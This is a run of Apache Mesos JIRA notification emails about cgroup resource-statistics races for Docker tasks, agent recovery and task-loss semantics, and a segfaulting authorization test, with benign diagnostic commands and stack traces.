Device: ca40h/51776dInode: 33967500Links: 1 Access: (0600/-rw---) Uid: (0/root) Gid: (0/root) Context: system_u:object_r:unlabeled_t:s0 Access: 2018-01-23 17:15:41.485506070 + Modify: 2018-01-23 17:12:25.749463047 + Change: 2018-01-23 17:12:25.749463047 + Birth: - $ sudo stat /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.pid File: ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.pid’ Size: 0 Blocks: 0 IO Block: 4096 regular empty file Device: ca40h/51776dInode: 33967495Links: 1 Access: (0600/-rw---) Uid: (0/root) Gid: (0/root) Context: system_u:object_r:unlabeled_t:s0 Access: 2018-01-23 23:00:42.190975780 + Modify: 2018-01-23 17:12:25.749463047 + Change: 2018-01-23 17:12:25.749463047 + Birth: - $ sudo stat /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/executor.info File: ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/executor.info’ Size: 0 Blocks: 0 IO Block: 4096 regular empty file Device: ca40h/51776dInode: 67306255Links: 1 Access: (0600/-rw---) Uid: (0/root) Gid: (0/root) Context: system_u:object_r:unlabeled_t:s0 Access: 2018-01-23 17:12:25.751463030 + Modify: 2018-01-23 17:12:25.751463030 + Change: 2018-01-23 17:12:25.751463030 + Birth: - {noformat} So were {{forked.pid}} and {{task.info}}. As a result, the agent failed to recover after reboot: {noformat} E0123 17:15:41.00 2709 slave.cpp:6800] EXIT with status 1: Failed to perform recovery: Failed to recover framework 6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112: Failed to read framework info from
[jira] [Commented] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.
[ https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336700#comment-16336700 ] Jie Yu commented on MESOS-8480: --- I checked the kernel code, looks like when a process exits (or killed), but hasn't been reaped yet (zombie), the proc file `/proc//cgroup` will still exist, but the cgroup of the task will be set to root cgroup: [https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/tree/kernel/cgroup.c?h=v4.1.49#n5194] [https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/tree/kernel/cgroup.c?h=v4.1.49#n1003] [https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/tree/kernel/exit.c?h=v4.1.49#n757] [https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/tree/kernel/cgroup.c?h=v4.1.49#n5357] > Mesos returns high resource usage when killing a Docker task. > - > > Key: MESOS-8480 > URL: https://issues.apache.org/jira/browse/MESOS-8480 > Project: Mesos > Issue Type: Bug > Components: cgroups >Reporter: Chun-Hung Hsiao >Assignee: Chun-Hung Hsiao >Priority: Major > Attachments: test.cpp > > > The way we get resource statistics for Docker tasks is through getting the > cgroup subsystem path through {{/proc//docker}} first (taking the > {{cpuacct}} subsystem as an example): > {noformat} > 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b > {noformat} > Then read > {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}} > to get the statistics: > {noformat} > user 4 > system 0 > {noformat} > However, when a Docker container is being teared down, it seems that Docker > or the operation system will first move the process to the root cgroup before > actually killing it, making {{/proc//docker}} look like the following: > {noformat} > 9:cpuacct,cpu:/ > {noformat} > This makes a racy call to > [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935] > return a single '/', which in turn makes > [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991] > read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the > statistics for the root cgroup: > {noformat} > user 228058750 > system 24506461 > {noformat} > This can be reproduced by [^test.cpp] with the following command: > {noformat} > $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect > sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep > ... > Reading file '/proc/44224/cgroup' > Reading file > '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat' > user 4 > system 0 > Reading file '/proc/44224/cgroup' > Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' > user 228058750 > system 24506461 > Reading file '/proc/44224/cgroup' > Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' > user 228058750 > system 24506461 > Failed to open file '/proc/44224/cgroup' > sleep > [2]- Exit 1 ./test $(docker inspect sleep | jq > .[].State.Pid) > {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-7911) Non-checkpointing framework's tasks should not be marked LOST when agent disconnects.
[ https://issues.apache.org/jira/browse/MESOS-7911?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Benjamin Mahler updated MESOS-7911: --- Description: Currently, when framework with checkpointing disabled has tasks running on an agent and that agent disconnects from the master, the master will mark those tasks LOST and remove them from its memory. The assumption is that the agent is disconnecting because it terminated. However, it's possible that this disconnection occurred due to a transient loss of connectivity and the agent re-connects while never having terminated. This case violates our assumption of there being no unknown tasks to the master: ``` void Master::reconcileKnownSlave( Slave* slave, const vector& executors, const vector& tasks) { ... // TODO(bmahler): There's an implicit assumption here the slave // cannot have tasks unknown to the master. This _should_ be the // case since the causal relationship is: // slave removes task -> master removes task // Add error logging for any violations of this assumption! ``` As a result, the tasks would remain on the agent but the master would not know about them! A more appropriate action here would be: # When an agent disconnects, mark the tasks as unreachable. ## If the framework is not partition aware, only show it the last known task state. ## If the framework is partition aware, let it know that it's now unreachable. # If the agent re-connects: ## And the agent had restarted, let the non-checkpointing framework know its tasks are GONE/LOST. ## If the agent still holds the tasks, the tasks are restored as reachable. # If the agent gets removed: ## For partition aware non-checkpointing frameworks, let them know the tasks are unreachable. ## For non partition aware non-checkpointing frameworks, let them know the tasks are lost and kill them if the agent comes back. was: Currently, when framework with checkpointing disabled has tasks running on an agent and that agent disconnects from the master, the master will mark those tasks LOST and remove them from its memory. The assumption is that the agent is disconnecting because it terminated. However, it's possible that this disconnection occurred due to a transient loss of connectivity and the agent re-connects while never having terminated. This case violates our assumption of there being no unknown tasks to the master: ``` void Master::reconcileKnownSlave( Slave* slave, const vector& executors, const vector& tasks) { ... // TODO(bmahler): There's an implicit assumption here the slave // cannot have tasks unknown to the master. This _should_ be the // case since the causal relationship is: // slave removes task -> master removes task // Add error logging for any violations of this assumption! ``` As a result, the tasks would remain on the agent but the master would not know about them! A more appropriate action here would be: (1) When an agent disconnects, mark the tasks as unreachable. (a) If the framework is not partition aware, only show it the last known task state. (b) If the framework is partition aware, let it know that it's now unreachable. (2) If the agent re-connects: (a) And the agent had restarted, let the non-checkpointing framework know its tasks are GONE/LOST. (b) If the agent still holds the tasks, the tasks are restored as reachable. (3) If the agent gets removed: (a) For partition aware non-checkpointing frameworks, let them know the tasks are unreachable. (b) For non partition aware non-checkpointing frameworks, let them know the tasks are lost and kill them if the agent comes back. > Non-checkpointing framework's tasks should not be marked LOST when agent > disconnects. > - > > Key: MESOS-7911 > URL: https://issues.apache.org/jira/browse/MESOS-7911 > Project: Mesos > Issue Type: Bug >Reporter: Benjamin Mahler >Priority: Critical > Labels: reliability > > Currently, when framework with checkpointing disabled has tasks running on an > agent and that agent disconnects from the master, the master will mark those > tasks LOST and remove them from its memory. The assumption is that the agent > is disconnecting because it terminated. > However, it's possible that this disconnection occurred due to a transient > loss of connectivity and the agent re-connects while never having terminated. > This case violates our assumption of there being no unknown tasks to the > master: > ``` > void Master::reconcileKnownSlave( > Slave* slave, > const vector& executors, > const vector& tasks) > { > ... > // TODO(bmahler): There's an implicit assumption here the slave > // cannot have tasks unknown to the master. This _should_ be the > // case since the causal relationship
[jira] [Updated] (MESOS-8453) ExecutorAuthorizationTest.RunTaskGroup segfaults.
[ https://issues.apache.org/jira/browse/MESOS-8453?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Benjamin Mahler updated MESOS-8453: --- Sprint: Mesosphere Sprint 73 > ExecutorAuthorizationTest.RunTaskGroup segfaults. > - > > Key: MESOS-8453 > URL: https://issues.apache.org/jira/browse/MESOS-8453 > Project: Mesos > Issue Type: Bug > Components: test >Affects Versions: 1.5.0 > Environment: Ubuntu 14.04 with SSL. >Reporter: Alexander Rukletsov >Assignee: Benjamin Mahler >Priority: Major > Labels: flaky-test > Attachments: RunTaskGroup-badrun.txt > > > {noformat} > 14:32:50 *** Aborted at 1516199570 (unix time) try "date -d @1516199570" if > you are using GNU date *** > 14:32:50 PC: @ 0x7f36ef13f8b0 std::_Hashtable<>::count() > 14:32:50 *** SIGSEGV (@0x107c7f88978) received by PID 19547 (TID > 0x7f36e2722700) from PID 18446744072769538424; stack trace: *** > 14:32:50 @ 0x7f36dcc763fd (unknown) > 14:32:50 @ 0x7f36dcc7b419 (unknown) > 14:32:50 @ 0x7f36dcc6f918 (unknown) > 14:32:50 @ 0x7f36eb99e330 (unknown) > 14:32:50 @ 0x7f36ef13f8b0 std::_Hashtable<>::count() > 14:32:50 @ 0x7f36ef12bd22 > _ZZN7process11ProcessBase8_consumeERKNS0_12HttpEndpointERKSsRKNS_5OwnedINS_4http7RequestNKUlRK6OptionINS7_14authentication20AuthenticationResultEEE0_clESH_ > 14:32:50 @ 0x7f36ef12c834 > _ZNO6lambda12CallableOnceIFN7process6FutureINS1_4http8ResponseEEEvEE10CallableFnINS_8internal7PartialIZNS1_11ProcessBase8_consumeERKNSB_12HttpEndpointERKSsRKNS1_5OwnedINS3_7RequestUlRK6OptionINS3_14authentication20AuthenticationResultEEE0_JSP_clEv > 14:32:50 @ 0x7f36ee1c1e8a > _ZNO6lambda12CallableOnceIFvPN7process11ProcessBaseEEE10CallableFnINS_8internal7PartialIZNS1_8internal8DispatchINS1_6FutureINS1_4http8ResponseclINS0_IFSE_vESE_RKNS1_4UPIDEOT_EUlSt10unique_ptrINS1_7PromiseISD_EESt14default_deleteISQ_EEOSI_S3_E_JST_SI_St12_PlaceholderILi1EEclEOS3_ > 14:32:50 @ 0x7f36ef118711 process::ProcessBase::consume() > 14:32:50 @ 0x7f36ef1309a2 process::ProcessManager::resume() > 14:32:50 @ 0x7f36ef134216 > _ZNSt6thread5_ImplISt12_Bind_simpleIFZN7process14ProcessManager12init_threadsEvEUlvE_vEEE6_M_runEv > 14:32:50 @ 0x7f36ec15a5b0 (unknown) > 14:32:50 @ 0x7f36eb996184 start_thread > 14:32:50 @ 0x7f36eb6c2ffd (unknown) > {noformat} > Full log attached. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Assigned] (MESOS-8453) ExecutorAuthorizationTest.RunTaskGroup segfaults.
[ https://issues.apache.org/jira/browse/MESOS-8453?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Benjamin Mahler reassigned MESOS-8453: -- Assignee: Benjamin Mahler > ExecutorAuthorizationTest.RunTaskGroup segfaults. > - > > Key: MESOS-8453 > URL: https://issues.apache.org/jira/browse/MESOS-8453 > Project: Mesos > Issue Type: Bug > Components: test >Affects Versions: 1.5.0 > Environment: Ubuntu 14.04 with SSL. >Reporter: Alexander Rukletsov >Assignee: Benjamin Mahler >Priority: Major > Labels: flaky-test > Attachments: RunTaskGroup-badrun.txt > > > {noformat} > 14:32:50 *** Aborted at 1516199570 (unix time) try "date -d @1516199570" if > you are using GNU date *** > 14:32:50 PC: @ 0x7f36ef13f8b0 std::_Hashtable<>::count() > 14:32:50 *** SIGSEGV (@0x107c7f88978) received by PID 19547 (TID > 0x7f36e2722700) from PID 18446744072769538424; stack trace: *** > 14:32:50 @ 0x7f36dcc763fd (unknown) > 14:32:50 @ 0x7f36dcc7b419 (unknown) > 14:32:50 @ 0x7f36dcc6f918 (unknown) > 14:32:50 @ 0x7f36eb99e330 (unknown) > 14:32:50 @ 0x7f36ef13f8b0 std::_Hashtable<>::count() > 14:32:50 @ 0x7f36ef12bd22 > _ZZN7process11ProcessBase8_consumeERKNS0_12HttpEndpointERKSsRKNS_5OwnedINS_4http7RequestNKUlRK6OptionINS7_14authentication20AuthenticationResultEEE0_clESH_ > 14:32:50 @ 0x7f36ef12c834 > _ZNO6lambda12CallableOnceIFN7process6FutureINS1_4http8ResponseEEEvEE10CallableFnINS_8internal7PartialIZNS1_11ProcessBase8_consumeERKNSB_12HttpEndpointERKSsRKNS1_5OwnedINS3_7RequestUlRK6OptionINS3_14authentication20AuthenticationResultEEE0_JSP_clEv > 14:32:50 @ 0x7f36ee1c1e8a > _ZNO6lambda12CallableOnceIFvPN7process11ProcessBaseEEE10CallableFnINS_8internal7PartialIZNS1_8internal8DispatchINS1_6FutureINS1_4http8ResponseclINS0_IFSE_vESE_RKNS1_4UPIDEOT_EUlSt10unique_ptrINS1_7PromiseISD_EESt14default_deleteISQ_EEOSI_S3_E_JST_SI_St12_PlaceholderILi1EEclEOS3_ > 14:32:50 @ 0x7f36ef118711 process::ProcessBase::consume() > 14:32:50 @ 0x7f36ef1309a2 process::ProcessManager::resume() > 14:32:50 @ 0x7f36ef134216 > _ZNSt6thread5_ImplISt12_Bind_simpleIFZN7process14ProcessManager12init_threadsEvEUlvE_vEEE6_M_runEv > 14:32:50 @ 0x7f36ec15a5b0 (unknown) > 14:32:50 @ 0x7f36eb996184 start_thread > 14:32:50 @ 0x7f36eb6c2ffd (unknown) > {noformat} > Full log attached. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-8479) Document agent SIGUSR1 behavior.
[ https://issues.apache.org/jira/browse/MESOS-8479?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] James Peach updated MESOS-8479: --- Summary: Document agent SIGUSR1 behavior. (was: Document agne SIGUSR1 behavior.) > Document agent SIGUSR1 behavior. > > > Key: MESOS-8479 > URL: https://issues.apache.org/jira/browse/MESOS-8479 > Project: Mesos > Issue Type: Bug > Components: agent, documentation >Reporter: James Peach >Priority: Major > > The agent enters shutdown when it receives {{SIGUSR1}}. We should document > what this means, the corresponding behavior and how operators are intended to > use this. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Comment Edited] (MESOS-8184) Implement master's AcknowledgeOfferOperationMessage handler.
[ https://issues.apache.org/jira/browse/MESOS-8184?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16291303#comment-16291303 ] Gastón Kleiman edited comment on MESOS-8184 at 1/23/18 10:18 PM: - [https://reviews.apache.org/r/65300/] [https://reviews.apache.org/r/64618/] was (Author: gkleiman): https://reviews.apache.org/r/64618/ > Implement master's AcknowledgeOfferOperationMessage handler. > > > Key: MESOS-8184 > URL: https://issues.apache.org/jira/browse/MESOS-8184 > Project: Mesos > Issue Type: Task >Reporter: Gastón Kleiman >Assignee: Gastón Kleiman >Priority: Major > Labels: mesosphere > > This handler should validate the message and forward it to the corresponding > agent/ERP. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.
[ https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Chun-Hung Hsiao updated MESOS-8480: --- Story Points: 2 (was: 3) > Mesos returns high resource usage when killing a Docker task. > - > > Key: MESOS-8480 > URL: https://issues.apache.org/jira/browse/MESOS-8480 > Project: Mesos > Issue Type: Bug > Components: cgroups >Reporter: Chun-Hung Hsiao >Assignee: Chun-Hung Hsiao >Priority: Major > Attachments: test.cpp > > > The way we get resource statistics for Docker tasks is through getting the > cgroup subsystem path through {{/proc//docker}} first (taking the > {{cpuacct}} subsystem as an example): > {noformat} > 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b > {noformat} > Then read > {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}} > to get the statistics: > {noformat} > user 4 > system 0 > {noformat} > However, when a Docker container is being teared down, it seems that Docker > or the operation system will first move the process to the root cgroup before > actually killing it, making {{/proc//docker}} look like the following: > {noformat} > 9:cpuacct,cpu:/ > {noformat} > This makes a racy call to > [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935] > return a single '/', which in turn makes > [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991] > read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the > statistics for the root cgroup: > {noformat} > user 228058750 > system 24506461 > {noformat} > This can be reproduced by [^test.cpp] with the following command: > {noformat} > $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect > sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep > ... > Reading file '/proc/44224/cgroup' > Reading file > '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat' > user 4 > system 0 > Reading file '/proc/44224/cgroup' > Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' > user 228058750 > system 24506461 > Reading file '/proc/44224/cgroup' > Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' > user 228058750 > system 24506461 > Failed to open file '/proc/44224/cgroup' > sleep > [2]- Exit 1 ./test $(docker inspect sleep | jq > .[].State.Pid) > {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.
[ https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Chun-Hung Hsiao updated MESOS-8480: --- Description: The way we get resource statistics for Docker tasks is through getting the cgroup subsystem path through {{/proc//docker}} first (taking the {{cpuacct}} subsystem as an example): {noformat} 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b {noformat} Then read {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}} to get the statistics: {noformat} user 4 system 0 {noformat} However, when a Docker container is being teared down, it seems that Docker or the operation system will first move the process to the root cgroup before actually killing it, making {{/proc//docker}} look like the following: {noformat} 9:cpuacct,cpu:/ {noformat} This makes a racy call to [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935] return a single '/', which in turn makes [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991] read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics for the root cgroup: {noformat} user 228058750 system 24506461 {noformat} This can be reproduced by [^test.cpp] with the following command: {noformat} $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep ... Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat' user 4 system 0 Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' user 228058750 system 24506461 Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' user 228058750 system 24506461 Failed to open file '/proc/44224/cgroup' sleep [2]- Exit 1 ./test $(docker inspect sleep | jq .[].State.Pid) {noformat} was: The way we get resource statistics for Docker tasks is through getting the cgroup subsystem path through {{/proc//docker}} first (taking the {{cpuacct}} subsystem as an example): {noformat} 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b {noformat} Then read {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}} to get the statistics: {noformat} user 4 system 0 {noformat} However, when a Docker container is being teared down, it seems that Docker or the operation system will first move the process to the root cgroup before actually killing it, making {{/proc//docker}} look like the following: {noformat} 9:cpuacct,cpu:/ {noformat} This makes [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935] return a single '/', which in turn makes [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991] read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics for the root cgroup: {noformat} user 228058750 system 24506461 {noformat} This can be reproduced by [^test.cpp] with the following command: {noformat} $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep ... Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat' user 4 system 0 Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' user 228058750 system 24506461 Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' user 228058750 system 24506461 Failed to open file '/proc/44224/cgroup' sleep [2]- Exit 1 ./test $(docker inspect sleep | jq .[].State.Pid) {noformat} > Mesos returns high resource usage when killing a Docker task. > - > > Key: MESOS-8480 > URL: https://issues.apache.org/jira/browse/MESOS-8480 > Project: Mesos > Issue Type: Bug > Components: cgroups >Reporter: Chun-Hung Hsiao >Assignee: Chun-Hung Hsiao >Priority: Major > Attachments: test.cpp > > > The way we get resource statistics for Docker tasks is through getting the > cgroup subsystem path through {{/proc//docker}} first (taking the > {{cpuacct}} subsystem as an example): > {noformat} > 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b > {noformat} > Then read >
[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.
[ https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Chun-Hung Hsiao updated MESOS-8480: --- Description: The way we get resource statistics for Docker tasks is through getting the cgroup subsystem path through {{/proc//docker}} first (taking the {{cpuacct}} subsystem as an example): {noformat} 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b {noformat} Then read {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}} to get the statistics: {noformat} user 4 system 0 {noformat} However, when a Docker container is being teared down, it seems that Docker or the operation system will first move the process to the root cgroup before actually killing it, making {{/proc//docker}} look like the following: {noformat} 9:cpuacct,cpu:/ {noformat} This makes [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935] return a single '/', which in turn makes [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991] read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics for the root cgroup: {noformat} user 228058750 system 24506461 {noformat} This can be reproduced by [^test.cpp] with the following command: {noformat} $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep ... Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat' user 4 system 0 Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' user 228058750 system 24506461 Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' user 228058750 system 24506461 Failed to open file '/proc/44224/cgroup' sleep [2]- Exit 1 ./test $(docker inspect sleep | jq .[].State.Pid) {noformat} was: The way we get resource statistics for Docker tasks is through getting the cgroup subsystem path through {{/proc//docker}} first (taking the {{cpuacct}} subsystem as an example): {noformat} 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b {noformat} Then read {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}} to get the statistics: {noformat} user 4 system 0 {noformat} However, when a Docker container is being teared down, it seems that Docker or the operation system will first move the process to the root cgroup before actually killing it, making {{/proc//docker}} look like the following: {noformat} 9:cpuacct,cpu:/ {noformat} This makes [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935] return a single '/', which in turn makes [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991] read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics for the root cgroup: {noformat} user 228058750 system 24506461 {noformat} This can be reproduced through test.cpp with the following command: {noformat} $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep ... Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat' user 4 system 0 Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' user 228058750 system 24506461 Reading file '/proc/44224/cgroup' Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' user 228058750 system 24506461 Failed to open file '/proc/44224/cgroup' sleep [2]- Exit 1 ./test $(docker inspect sleep | jq .[].State.Pid) {noformat} > Mesos returns high resource usage when killing a Docker task. > - > > Key: MESOS-8480 > URL: https://issues.apache.org/jira/browse/MESOS-8480 > Project: Mesos > Issue Type: Bug > Components: cgroups >Reporter: Chun-Hung Hsiao >Assignee: Chun-Hung Hsiao >Priority: Major > Attachments: test.cpp > > > The way we get resource statistics for Docker tasks is through getting the > cgroup subsystem path through {{/proc//docker}} first (taking the > {{cpuacct}} subsystem as an example): > {noformat} > 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b > {noformat} > Then read >
[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.
[ https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Chun-Hung Hsiao updated MESOS-8480: --- Attachment: test.cpp > Mesos returns high resource usage when killing a Docker task. > - > > Key: MESOS-8480 > URL: https://issues.apache.org/jira/browse/MESOS-8480 > Project: Mesos > Issue Type: Bug > Components: cgroups >Reporter: Chun-Hung Hsiao >Assignee: Chun-Hung Hsiao >Priority: Major > Attachments: test.cpp > > > The way we get resource statistics for Docker tasks is through getting the > cgroup subsystem path through {{/proc//docker}} first (taking the > {{cpuacct}} subsystem as an example): > {noformat} > 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b > {noformat} > Then read > {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}} > to get the statistics: > {noformat} > user 4 > system 0 > {noformat} > However, when a Docker container is being teared down, it seems that Docker > or the operation system will first move the process to the root cgroup before > actually killing it, making {{/proc//docker}} look like the following: > {noformat} > 9:cpuacct,cpu:/ > {noformat} > This makes > [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935] > return a single '/', which in turn makes > [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991] > read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the > statistics for the root cgroup: > {noformat} > user 228058750 > system 24506461 > {noformat} > This can be reproduced through test.cpp with the following command: > {noformat} > $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect > sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep > ... > Reading file '/proc/44224/cgroup' > Reading file > '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat' > user 4 > system 0 > Reading file '/proc/44224/cgroup' > Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' > user 228058750 > system 24506461 > Reading file '/proc/44224/cgroup' > Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat' > user 228058750 > system 24506461 > Failed to open file '/proc/44224/cgroup' > sleep > [2]- Exit 1 ./test $(docker inspect sleep | jq > .[].State.Pid) > {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
